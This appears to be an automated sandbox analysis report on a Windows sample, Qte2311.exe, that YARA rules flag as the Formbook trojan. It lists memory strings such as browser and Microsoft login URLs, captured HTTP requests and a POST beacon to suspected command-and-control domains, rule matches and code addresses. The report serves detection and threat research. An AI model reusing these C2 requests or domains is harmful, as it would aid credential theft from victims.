Source: runas.exe, 00000005.00000002.4113575754.0000000007D2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/u0t4/?ipNhfX=1CC
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Qte2311.exe, 00000000.00000002.1663251257.0000000005F90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.comX
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runas.exe, 00000005.00000003.1974318457.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: runas.exe, 00000005.00000002.4111828153.0000000005E2E000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002E8E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK
Source: unknown HTTP traffic detected: POST /u0t4/ HTTP/1.1Host: www.owcojyyde.bestAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.owcojyyde.bestReferer: http://www.owcojyyde.best/u0t4/Connection: closeContent-Length: 187Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36Data Raw: 69 70 4e 68 66 58 3d 65 38 4d 4e 48 2f 79 31 58 75 44 53 65 46 45 52 39 37 59 31 48 36 6d 37 36 78 67 55 2b 76 36 51 50 34 4f 6a 33 6b 77 46 68 64 71 35 76 4d 39 70 75 43 4b 46 6c 42 48 46 67 43 44 2f 57 32 51 33 61 30 36 6f 51 78 2b 73 38 45 38 78 52 35 73 32 2f 72 39 6b 62 4d 42 55 49 73 4c 58 58 2b 41 79 59 48 74 4e 4d 6b 42 41 35 64 59 31 41 4d 64 4b 4f 55 75 46 79 46 4d 58 73 41 76 49 61 64 6a 4f 43 77 4a 77 2b 7a 79 53 36 57 6c 61 46 78 4b 50 75 6b 6b 55 33 5a 32 76 4f 6f 57 46 79 65 33 49 4b 36 6a 44 47 63 71 42 37 6b 62 77 66 75 4f 4b 4f 41 3d 3d Data Ascii: ipNhfX=e8MNH/y1XuDSeFER97Y1H6m76xgU+v6QP4Oj3kwFhdq5vM9puCKFlBHFgCD/W2Q3a06oQx+s8E8xR5s2/r9kbMBUIsLXX+AyYHtNMkBA5dY1AMdKOUuFyFMXsAvIadjOCwJw+zyS6WlaFxKPukkU3Z2vOoWFye3IK6jDGcqB7kbwfuOKOA==
Source: unknown DNS traffic detected: queries for: www.drtonks.com
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=yeZb8GK9kb308m6tqpQSWKVePpKokD/DhHuephdMkCBCe/gXfDvon4YRbmogRZs51d24yXmjv9s2GuQK2J30uG9jNiVx5pUDTA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.drtonks.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=T+ktEIOjX9T5dGcj9rUsXIa48WZT28SiLvO+yVBZwvWEp9g0wSKFlyHjxBvBWF4XQFrqNUOHqhRxKaY3zbxWdu06McXUafUYdA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.owcojyyde.bestAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=pk6UlYKypwTcdRigHYvXwaXnbRoM4y7Rx6CIM21Q8kT0nxxz4tr7Q0wSojmMfoxURV3iEB8rSWMGZNGZ3jUdb07QIb/TctJEsw==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.majinfo.techAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK+dlDXWJ9cmev8ZYmFh9Bk+wzUoT6TgNjxSlOMQ==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.rva.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=4EteGVMU5QusLCd8WOgjQMJSMXeXzA2vwQTj1x/Wv0fSPBpLzP4ZjqwCxd5WAfB87rYwoEydCHJiwFyGwE65y6hYDNnXCDKbTA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.ghswanhar.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=ZUvXaveAn+Mj+tnST7bSiJ2JwfpFPPY9VKgiVLhz9pIo5hypx732FJmQOFcPVCgcsF350nabn4Y8nAcrKLrIHurvDd/yCXFvmw==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.arteunmapa.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=XNk/b9CReA2PmrT6V9nRJKml7Bwv5n/yLOhYcFkNWR1WhWm4S78oywurhHAd6q+OOWdCw7RAri9AvuhxeeQNKzba3a077jm8zA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.beautwin.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36

E-Banking Fraud

Source: Yara match File source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Qte2311.exe.5d80000.10.raw.unpack, RFebBaClhEWIFvwxqU.cs Large array initialization: array initializer size 9041
Source: 0.2.Qte2311.exe.3573c38.7.raw.unpack, RFebBaClhEWIFvwxqU.cs Large array initialization: array initializer size 9041
Source: Qte2311.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AEF698 0_2_01AEF698
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AECE1C 0_2_01AECE1C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AEF688 0_2_01AEF688
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D42106 0_2_07D42106
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C100 0_2_07D4C100
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C0F2 0_2_07D4C0F2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C0B9 0_2_07D4C0B9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D49D1F 0_2_07D49D1F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D49D30 0_2_07D49D30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D42C38 0_2_07D42C38
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401A3C 3_2_00401A3C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00410073 3_2_00410073
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040287C 3_2_0040287C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403001 3_2_00403001
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403010 3_2_00403010
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040E0F3 3_2_0040E0F3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004048F8 3_2_004048F8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402880 3_2_00402880
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403109 3_2_00403109
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040110C 3_2_0040110C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401110 3_2_00401110
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401240 3_2_00401240
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040E237 3_2_0040E237
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402B59 3_2_00402B59
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402B60 3_2_00402B60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0041631E 3_2_0041631E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00416323 3_2_00416323
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401C55 3_2_00401C55
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0042A413 3_2_0042A413
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004034D0 3_2_004034D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403484 3_2_00403484
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040FE4B 3_2_0040FE4B
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040FE53 3_2_0040FE53
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004026A7 3_2_004026A7
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004026B0 3_2_004026B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019041A2 3_2_019041A2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019101AA 3_2_019101AA
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019081CC 3_2_019081CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01840100 3_2_01840100
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D8158 3_2_018D8158
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E3F0 3_2_0185E3F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019103E6 3_2_019103E6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190A352 3_2_0190A352
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D02C0 3_2_018D02C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F0274 3_2_018F0274
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01910591 3_2_01910591
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850535 3_2_01850535
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FE4F6 3_2_018FE4F6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F4420 3_2_018F4420
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01902446 3_2_01902446
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184C7C0 3_2_0184C7C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01874750 3_2_01874750
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850770 3_2_01850770
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186C6E0 3_2_0186C6E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018529A0 3_2_018529A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0191A9A6 3_2_0191A9A6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01866962 3_2_01866962
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018368B8 3_2_018368B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0187E8F0 3_2_0187E8F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01852840 3_2_01852840
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185A840 3_2_0185A840
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01906BD7 3_2_01906BD7
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190AB40 3_2_0190AB40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184EA80 3_2_0184EA80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01868DBF 3_2_01868DBF
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184ADE0 3_2_0184ADE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185AD00 3_2_0185AD00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018ECD1F 3_2_018ECD1F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F0CB5 3_2_018F0CB5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01840CF2 3_2_01840CF2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850C00 3_2_01850C00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018CEFA0 3_2_018CEFA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01842FC8 3_2_01842FC8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01892F28 3_2_01892F28
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01870F30 3_2_01870F30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F2F30 3_2_018F2F30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018C4F40 3_2_018C4F40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190CE93 3_2_0190CE93
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01862E90 3_2_01862E90
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190EEDB 3_2_0190EEDB
